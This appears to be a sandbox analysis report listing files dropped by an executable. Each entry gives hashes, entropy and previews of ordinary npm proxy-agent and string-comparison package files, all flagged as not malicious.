              Preview:{. "name": "@isaacs/string-locale-compare",. "version": "1.1.0",. "files": [. "index.js". ],. "main": "index.js",. "description": "Compare strings with Intl.Collator if available, falling back to String.localeCompare otherwise",. "repository": {. "type": "git",. "url": "git+https://github.com/isaacs/string-locale-compare". },. "author": "Isaac Z. Schlueter <i@izs.me> (https://izs.me)",. "license": "ISC",. "scripts": {. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags". },. "tap": {. "check-coverage": true. },. "devDependencies": {. "tap": "^15.0.9". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5807
              Entropy (8bit):4.543914011544418
              Encrypted:false
              SSDEEP:
              MD5:3EDBB1D7C3470EEBF949997CA9949B97
              SHA1:193D815AA1F38CE500506A6D654A4B1A6536743A
              SHA-256:0A9D06FC14BD78AA7EE59635ED5284F64E571A33B7DA13A5F48D0789307DEA81
              SHA-512:C138FE7D6E177EDD140CA6140F889F2A0283E8C368FC5F79690F376D3AFD63DB576636CC947C502451615CF9410EF8156C5C81594D7EE87A95F8D7744D751C39
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const net = require('net').const tls = require('tls').const { once } = require('events').const timers = require('timers/promises').const { normalizeOptions, cacheOptions } = require('./options').const { getProxy, getProxyAgent, proxyCache } = require('./proxy.js').const Errors = require('./errors.js').const { Agent: AgentBase } = require('agent-base')..module.exports = class Agent extends AgentBase {. #options. #timeouts. #proxy. #noProxy. #ProxyAgent.. constructor (options = {}) {. const { timeouts, proxy, noProxy, ...normalizedOptions } = normalizeOptions(options).. super(normalizedOptions).. this.#options = normalizedOptions. this.#timeouts = timeouts.. if (proxy) {. this.#proxy = new URL(proxy). this.#noProxy = noProxy. this.#ProxyAgent = getProxyAgent(proxy). }. }.. get proxy () {. return this.#proxy ? { url: this.#proxy } : {}. }.. #getProxy (options) {. if (!this.#proxy) {. return. }.. const proxy = getPro
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1250
              Entropy (8bit):4.667547365437096
              Encrypted:false
              SSDEEP:
              MD5:F7A03D587E16CD4CC9D082FB6EBE2E0F
              SHA1:2A474310F48BC231EFB9EEBA7673C1EC71150391
              SHA-256:58A0ABCFB7AB16ECE73A1FEA304B8CB4539F650C4F2726E2D5980C285A96351B
              SHA-512:F5AEAC656FC0528F647904090564D8A7DC22ABEB07B2DAB0AF04D8C5A6B045C2BDF9419CAA8EE94A8BD450FBABC48EB4361FFF790710C7A14B096557CA0063C4
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { LRUCache } = require('lru-cache').const dns = require('dns')..// this is a factory so that each request can have its own opts (i.e. ttl).// while still sharing the cache across all requests.const cache = new LRUCache({ max: 50 })..const getOptions = ({. family = 0,. hints = dns.ADDRCONFIG,. all = false,. verbatim = undefined,. ttl = 5 * 60 * 1000,. lookup = dns.lookup,.}) => ({. // hints and lookup are returned since both are top level properties to (net|tls).connect. hints,. lookup: (hostname, ...args) => {. const callback = args.pop() // callback is always last arg. const lookupOptions = args[0] ?? {}.. const options = {. family,. hints,. all,. verbatim,. ...(typeof lookupOptions === 'number' ? { family: lookupOptions } : lookupOptions),. }.. const key = JSON.stringify({ hostname, ...options }).. if (cache.has(key)) {. const cached = cache.get(key). return process.nextTick(callback, null, ...cached).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1394
              Entropy (8bit):4.75057275950978
              Encrypted:false
              SSDEEP:
              MD5:E9887AA65F829642474E034E10CF1A12
              SHA1:33354127DED477A54C9D25F677A0ADEBE45AF151
              SHA-256:F4EE0F8A8AC25830BE4A902246059D260E5254BA9E2E766EEF84972EEB66926D
              SHA-512:664D5422ABDD8ED92FD6C4783A413301A887BB70B3C20783B6890EB23FC1915415842EF4DFAEE7BAFAE4BF9DEA1A9133E7DB9B63C503D6D88B12FF8805EB16CF
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..class InvalidProxyProtocolError extends Error {. constructor (url) {. super(`Invalid protocol \`${url.protocol}\` connecting to proxy \`${url.host}\``). this.code = 'EINVALIDPROXY'. this.proxy = url. }.}..class ConnectionTimeoutError extends Error {. constructor (host) {. super(`Timeout connecting to host \`${host}\``). this.code = 'ECONNECTIONTIMEOUT'. this.host = host. }.}..class IdleTimeoutError extends Error {. constructor (host) {. super(`Idle timeout reached for host \`${host}\``). this.code = 'EIDLETIMEOUT'. this.host = host. }.}..class ResponseTimeoutError extends Error {. constructor (request, proxy) {. let msg = 'Response timeout '. if (proxy) {. msg += `from proxy \`${proxy.host}\` `. }. msg += `connecting to host \`${request.host}\``. super(msg). this.code = 'ERESPONSETIMEOUT'. this.proxy = proxy. this.request = request. }.}..class TransferTimeoutError extends Error {. constructor (request, proxy
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1257
              Entropy (8bit):4.770195190644375
              Encrypted:false
              SSDEEP:
              MD5:E41DACD9A9F8D7444C7C01C3BB86C52A
              SHA1:26B6D404D602CF44F0E6386DB26836D25764498A
              SHA-256:8D7B321C0EB45D3DDACC78B48448B2ED02AD79284F931D73F4BD0A67D0F5A4DD
              SHA-512:BA6F5667F1AE33AF171D20F601A0D4F9E61597CF7E0C10867DC41C9D8E247AF722E16D60807C96BEBC6F5B238AD97C3A4A6FFA0AB514EBF784CB384E9BBB2B6D
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { LRUCache } = require('lru-cache').const { normalizeOptions, cacheOptions } = require('./options').const { getProxy, proxyCache } = require('./proxy.js').const dns = require('./dns.js').const Agent = require('./agents.js')..const agentCache = new LRUCache({ max: 20 })..const getAgent = (url, { agent, proxy, noProxy, ...options } = {}) => {. // false has meaning so this can't be a simple truthiness check. if (agent != null) {. return agent. }.. url = new URL(url).. const proxyForUrl = getProxy(url, { proxy, noProxy }). const normalizedOptions = {. ...normalizeOptions(options),. proxy: proxyForUrl,. }.. const cacheKey = cacheOptions({. ...normalizedOptions,. secureEndpoint: url.protocol === 'https:',. }).. if (agentCache.has(cacheKey)) {. return agentCache.get(cacheKey). }.. const newAgent = new Agent(normalizedOptions). agentCache.set(cacheKey, newAgent).. return newAgent.}..module.exports = {. getAgent,. Agent,. // these are expor
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2437
              Entropy (8bit):4.683469825938324
              Encrypted:false
              SSDEEP:
              MD5:B42C7FAFD08DC1B8F21A532CC53F5037
              SHA1:5A62DE6018AF590EB8661F2042871753E8F7FF51
              SHA-256:C475022B830424DBDF75987670549F32BC08C43C224731FD20CDC4F747F56901
              SHA-512:7454525F2533812960BE55EC6BF2168D0F9F3F79613702C4543F495C9872B952587162D590A9FFFF78FCEC80EE436F09DD9844DA3BC69BB4AD94B3E5153625F3
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const dns = require('./dns')..const normalizeOptions = (opts) => {. const family = parseInt(opts.family ?? '0', 10). const keepAlive = opts.keepAlive ?? true.. const normalized = {. // nodejs http agent options. these are all the defaults. // but kept here to increase the likelihood of cache hits. // https://nodejs.org/api/http.html#new-agentoptions. keepAliveMsecs: keepAlive ? 1000 : undefined,. maxSockets: opts.maxSockets ?? 15,. maxTotalSockets: Infinity,. maxFreeSockets: keepAlive ? 256 : undefined,. scheduling: 'fifo',. // then spread the rest of the options. ...opts,. // we already set these to their defaults that we want. family,. keepAlive,. // our custom timeout options. timeouts: {. // the standard timeout option is mapped to our idle timeout. // and then deleted below. idle: opts.timeout ?? 0,. connection: 0,. response: 0,. transfer: 0,. ...opts.timeouts,. },. // get the dn
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2011
              Entropy (8bit):5.042198653913491
              Encrypted:false
              SSDEEP:
              MD5:CF37AD09E180F34501C5D3225A1A3BDE
              SHA1:29B9CA8D1D1C0C6A6AB125A49078BF716CAD86BB
              SHA-256:192A78A72232F67D0CBD46FE8F9DBD994F98C197CB345570C312AAAC12831111
              SHA-512:8886DD89B085347D630E542612D126BA917B92DE2540AF1C73136F1BAE348322A3A2E24C0B0510C5F0FE2D5ED2D4A50DAC140FEC91DCFE9093690BE21EB3F964
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { HttpProxyAgent } = require('http-proxy-agent').const { HttpsProxyAgent } = require('https-proxy-agent').const { SocksProxyAgent } = require('socks-proxy-agent').const { LRUCache } = require('lru-cache').const { InvalidProxyProtocolError } = require('./errors.js')..const PROXY_CACHE = new LRUCache({ max: 20 })..const SOCKS_PROTOCOLS = new Set(SocksProxyAgent.protocols)..const PROXY_ENV_KEYS = new Set(['https_proxy', 'http_proxy', 'proxy', 'no_proxy'])..const PROXY_ENV = Object.entries(process.env).reduce((acc, [key, value]) => {. key = key.toLowerCase(). if (PROXY_ENV_KEYS.has(key)) {. acc[key] = value. }. return acc.}, {})..const getProxyAgent = (url) => {. url = new URL(url).. const protocol = url.protocol.slice(0, -1). if (SOCKS_PROTOCOLS.has(protocol)) {. return SocksProxyAgent. }. if (protocol === 'https' || protocol === 'http') {. return [HttpProxyAgent, HttpsProxyAgent]. }.. throw new InvalidProxyProtocolError(url).}..const isNoProxy = (u
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2314
              Entropy (8bit):4.850805918008236
              Encrypted:false
              SSDEEP:
              MD5:978A0823E78E9CBD9EC52C4FD73444AA
              SHA1:16FECB2FD128064BBC3EF6AF64AA48291CD1FE60
              SHA-256:6043C5C1BB76491992F6C56F65895E2E9167AE10122FEF4D58D6638EBAC4BA05
              SHA-512:3567BD54725002BBF620002071D8227EE19975DBDD097FCDA35673B3ADBABC0778BBEEAADCED02EF5B9FA0E6817B476AD22BE4617345EB0809A3B55D58EF2CE7
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4385
              Entropy (8bit):4.720524126155081
              Encrypted:false
              SSDEEP:
              MD5:1A2CDE316A5277E6E19E4C7E4030135F
              SHA1:A76144710515A154821759A75E97B38EEB64E394
              SHA-256:D1118107DF038CCBA8E6C9BEBD78A6C9975F5906EE128E1FE0CD34AF25123269
              SHA-512:B9B50D62B94029D0149DB17BA7654E73D09B0CA8D2B7CF6F044CE638AEAD8094ADB811A9EF104E8786546FFFE0E047FE95BF98EC6BC2A62666F598EDAD602364
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1106
              Entropy (8bit):4.695959806053996
              Encrypted:false
              SSDEEP:
              MD5:6CF16A99196F52F28CBBB366118DA4A6
              SHA1:757AC71C6057973E410D08CA8DFD1562E731754C
              SHA-256:64266F0007635290ADC31871142A8BF305B52D8C51443107B274A18405F26D2D
              SHA-512:F3AC6D0CB1B94844D4F2B0BBEEDA31A397DA5495A0B7BB16B5C7632EA72BBF146103BA032D98C8B155458EE12A010FAF2FFE5B2029124042C76DF66F58665744
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "agent-base",. "version": "7.1.0",. "description": "Turn a function into an `http.Agent` instance",. "main": "./dist/index.js",. "types": "./dist/index.d.ts",. "files": [. "dist". ],. "repository": {. "type": "git",. "url": "https://github.com/TooTallNate/proxy-agents.git",. "directory": "packages/agent-base". },. "keywords": [. "http",. "agent",. "base",. "barebones",. "https". ],. "author": "Nathan Rajlich <nathan@tootallnate.net> (http://n8.io/)",. "license": "MIT",. "dependencies": {. "debug": "^4.3.4". },. "devDependencies": {. "@types/debug": "^4.1.7",. "@types/jest": "^29.5.1",. "@types/node": "^14.18.45",. "@types/semver": "^7.3.13",. "@types/ws": "^6.0.4",. "async-listen": "^3.0.0",. "jest": "^29.5.0",. "ts-jest": "^29.1.0",. "typescript": "^5.0.4",. "ws": "^3.3.3",. "tsconfig": "0.0.0". },. "engines": {. "node": ">= 14". },. "scripts": {. "build": "tsc",. "test": "jest --env
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1125
              Entropy (8bit):5.152168496378463
              Encrypted:false
              SSDEEP:
              MD5:DC944E6612DA9341E648E5FD43DAB7A2
              SHA1:E08E2F8A1B49469468C5771239F00591DB3BEFD8
              SHA-256:5AA012C5C5E970177D1FF9144121A598FA082434391061504B2D77A70289097F
              SHA-512:74AC6CF1FAC6D350981FD794AEB9219FAE296CC4058A347D7F51EE902D395B4B078206B62F2AFFF5D6E440B86B915702202ED44CA7FB9551F7B4B5FFE541CEB1
              Malicious:false
              Reputation:unknown
              Preview:License.-------..(The MIT License)..Copyright (c) 2013 Nathan Rajlich &lt;nathan@tootallnate.net&gt;..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRA
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6046
              Entropy (8bit):4.7534258944601655
              Encrypted:false
              SSDEEP:
              MD5:7D5B6FC35C36DD6EEB8AB07A3252D283
              SHA1:669A3B8EA2F3274F861FC416F75D43727676BD67
              SHA-256:B4CD12238114F78CBF58CD8CEF3B25EEE4CB40FF2D57FC3EBD5FF3A80C2EB131
              SHA-512:93F681EEA4FFE06FA508D0B10FA3F0428CD909B78F00F860FBB0624D0FEA96E45A98F6E65B194F947E9C8E3E6D86EE21B5D01D4A61F99CDC88F327198B9247C9
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1084
              Entropy (8bit):4.751290606395636
              Encrypted:false
              SSDEEP:
              MD5:778472210489A5B2074432113895B5FA
              SHA1:B5B3434273CFFA35FA3CEE9DC2F36751442D2882
              SHA-256:A55E0F41B5604D0479C1179F09F55A624F7F2092A89207BDC5B438323F4F6770
              SHA-512:526A61B2211092978DED9F319F755DB1674E453A8B9AE9844614C3BE8BF53D19D07919C6CD7235F7E0590125DDC998E076277F103050B62860A6704766D367D1
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "http-proxy-agent",. "version": "7.0.0",. "description": "An HTTP(s) proxy `http.Agent` implementation for HTTP",. "main": "./dist/index.js",. "types": "./dist/index.d.ts",. "files": [. "dist". ],. "repository": {. "type": "git",. "url": "https://github.com/TooTallNate/proxy-agents.git",. "directory": "packages/http-proxy-agent". },. "keywords": [. "http",. "proxy",. "endpoint",. "agent". ],. "author": "Nathan Rajlich <nathan@tootallnate.net> (http://n8.io/)",. "license": "MIT",. "dependencies": {. "agent-base": "^7.1.0",. "debug": "^4.3.4". },. "devDependencies": {. "@types/debug": "^4.1.7",. "@types/jest": "^29.5.1",. "@types/node": "^14.18.45",. "async-listen": "^3.0.0",. "jest": "^29.5.0",. "ts-jest": "^29.1.0",. "typescript": "^5.0.4",. "proxy": "2.1.1",. "tsconfig": "0.0.0". },. "engines": {. "node": ">= 14". },. "scripts": {. "build": "tsc",. "test": "jest --env node --verbose --bail
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7440
              Entropy (8bit):4.702798904285215
              Encrypted:false
              SSDEEP:
              MD5:85E012FD9DFB97FF531EB1EDEF920F08
              SHA1:BCF1B915C657EF135A16461DE40007CBD301EE02
              SHA-256:66A6E393E010944B14D56C1C01539DA50A40D249E1CA24F692568ECB5215CB2C
              SHA-512:BC1A67E67DC75878B982AECDE9D07D2B672A42FBD33835D49B25AB34B4AC59D9887C241ADAFFB56AECCCA958CD7545489419BAB733D5D1FE359125448E90ACD3
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3908
              Entropy (8bit):4.182037166062878
              Encrypted:false
              SSDEEP:
              MD5:D140345EE9C006E6897CD2C800B25A41
              SHA1:977F28E0AC856A4C989BE779CFE337E6F47D7B61
              SHA-256:36A30EBCD66060FA8E3ABA8295854757AFBD60F2643D8992814727F249C5EBA0
              SHA-512:D29A556E5E6A1626463A797A94971CA42A71859993A83E02040743B07ECA53F4B5C26ABC9AC25196FD1992107CCAA997795B815C9FAC058F0EF7566125AB4D6A
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.parseProxyResponse = void 0;.const debug_1 = __importDefault(require("debug"));.const debug = (0, debug_1.default)('https-proxy-agent:parse-proxy-response');.function parseProxyResponse(socket) {. return new Promise((resolve, reject) => {. // we need to buffer any HTTP traffic that happens with the proxy before we get. // the CONNECT response, so that if the response is anything other than an "200". // response code, then we can re-play the "data" events on the socket once the. // HTTP parser is hooked up.... let buffersLength = 0;. const buffers = [];. function read() {. const b = socket.read();. if (b). ondata(b);. else. socket.once('readable', read);
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1223
              Entropy (8bit):4.736255381751044
              Encrypted:false
              SSDEEP:
              MD5:5EB72D18E27F5025B9A9DD856550F49D
              SHA1:3C71093D44BE0C91A36D2C2953170B59EDAF4CEB
              SHA-256:F62F929F550F77C2AA9A088FC1D86F278CB0AAB361C3A0BD9DC2159D9E398377
              SHA-512:8EDA771B053205613EC5C91617E222E440F64B25F35ED1FDE96BA4F3966721AA8B85103953C4BAED8FFE8922164D8DBBFF7C6BAE84982E62E52832ADC15394F1
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "https-proxy-agent",. "version": "7.0.2",. "description": "An HTTP(s) proxy `http.Agent` implementation for HTTPS",. "main": "./dist/index.js",. "types": "./dist/index.d.ts",. "files": [. "dist". ],. "repository": {. "type": "git",. "url": "https://github.com/TooTallNate/proxy-agents.git",. "directory": "packages/https-proxy-agent". },. "keywords": [. "https",. "proxy",. "endpoint",. "agent". ],. "author": "Nathan Rajlich <nathan@tootallnate.net> (http://n8.io/)",. "license": "MIT",. "dependencies": {. "agent-base": "^7.0.2",. "debug": "4". },. "devDependencies": {. "@types/async-retry": "^1.4.5",. "@types/debug": "4",. "@types/jest": "^29.5.1",. "@types/node": "^14.18.45",. "async-listen": "^3.0.0",. "async-retry": "^1.3.3",. "jest": "^29.5.0",. "ts-jest": "^29.1.0",. "typescript": "^5.0.4",. "proxy": "2.1.1",. "tsconfig": "0.0.0". },. "engines": {. "node": ">= 14". },. "scripts": {. "b
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6272
              Entropy (8bit):4.539284135077422
              Encrypted:false
              SSDEEP:
              MD5:0CB45D485991A7313AF036F865B89F3B
              SHA1:890C3A0BCF5F8D5D585BC8099C3EA28B1210C0F3
              SHA-256:C7C8D491F3A7121930E7A3C349286BEF177412D480E99416FD0EC760F753BF8D
              SHA-512:8C15638314C5C6678CD9C4D8289DCE677E9931A635A71E717B1E2D370A07A53239564DA7BDF04B4AAFB5429A43E9E8FCE5A46E9B7E330C4FA5C3FD8347B45BB4
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):3203
              Entropy (8bit):4.7114959128489105
              Encrypted:false
              SSDEEP:
              MD5:6D286E77C24552CEA1D27FCDD61C038D
              SHA1:648C681D3A825962385D38434EF018D4F368FFBA
              SHA-256:32D6A42739468B18E603574418F50C64E7A90B515F005957D82A83BBE064118D
              SHA-512:0A1417C8C52EEBAC3BB4109D9A1C2EBB56CC066A4B775489EC2F9810AE6E32374E71F136D6304345B493AD99CA9C1F9B322CFD6A00FEA249888CEE17D6E6515C
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "socks-proxy-agent",. "version": "8.0.2",. "description": "A SOCKS proxy `http.Agent` implementation for HTTP and HTTPS",. "main": "./dist/index.js",. "types": "./dist/index.d.ts",. "files": [. "dist". ],. "author": {. "email": "nathan@tootallnate.net",. "name": "Nathan Rajlich",. "url": "http://n8.io/". },. "contributors": [. {. "name": "Kiko Beats",. "email": "josefrancisco.verdu@gmail.com". },. {. "name": "Josh Glazebrook",. "email": "josh@joshglazebrook.com". },. {. "name": "talmobi",. "email": "talmobi@users.noreply.github.com". },. {. "name": "Indospace.io",. "email": "justin@indospace.io". },. {. "name": "Kilian von Pflugk",. "email": "github@jumoog.io". },. {. "name": "Kyle",. "email": "admin@hk1229.cn". },. {. "name": "Matheus Fernandes",. "email": "matheus.frndes@gmail.com". },. {. "name": "Ricky Miller",. "email": "rich
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1481
              Entropy (8bit):4.71920298763811
              Encrypted:false
              SSDEEP:
              MD5:2DE277CAA6AB7DB160A74DC6CBC80A9A
              SHA1:B13705199349A33B543565A266E33616E02837C4
              SHA-256:D2DB1AD9D4780FD5B82DBDF35A3A30409C225F6B1B86748552817EE372541A87
              SHA-512:7FC5375CC21441998A6E7652E5E65649663D48AE68039BB1C740AE5BEFCAF71B168B08BE75677ED2A261EFC2369F591C6AEBAC5B57549D7A417DBB94E0E65884
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@npmcli/agent",. "version": "2.2.0",. "description": "the http/https agent used by the npm cli",. "main": "lib/index.js",. "scripts": {. "gencerts": "bash scripts/create-cert.sh",. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "author": "GitHub Inc.",. "license": "ISC",. "bugs": {. "url": "https://github.com/npm/agent/issues". },. "homepage": "https://github.com/npm/agent#readme",. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^16.14.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-oss. Edits may be overwritten.",. "version": "4.19.0",. "publish": "true". },. "dependencies": {. "agent-base": "^7.1.0",. "http-proxy-agent": "^7.0.0",. "https-proxy-agent": "^7
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):738
              Entropy (8bit):4.9740509338626095
              Encrypted:false
              SSDEEP:
              MD5:D80A3B8216B56C31766EEFEC43A9081C
              SHA1:6E7118376680E2881DD17A196F923D879B6C9A34
              SHA-256:9DD1BC5666FD1E32F086518046532E993F5307749327AFF37CECF98355F2B9A0
              SHA-512:7F21967618DDC42E4371763B1993BB4D7CCA296F6B83AB94C6E70E2BF31B7C8540626EF409D30F85907F173DE51EBBE248EDC1239F7CFBE971A83387A9CE700B
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) npm Inc...Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1018
              Entropy (8bit):4.843758564359199
              Encrypted:false
              SSDEEP:
              MD5:915A3A45F508FE42C50143E822771C07
              SHA1:B9116C2DBE58A228EF561F888773D9A5580BD7C6
              SHA-256:54F6EECF7C0C4DBA4B473B2E4012B9740E324A236EF7C29A89513DE0CC578E31
              SHA-512:793203A6F2311AE634906EBEAAD711D051A965A70BDA103A5C33787EAB8ADC82B77BF88887BDA123294A5A2CDD406454F1A675F713C8CE5715AF84E0C0AC2E2D
              Malicious:false
              Reputation:unknown
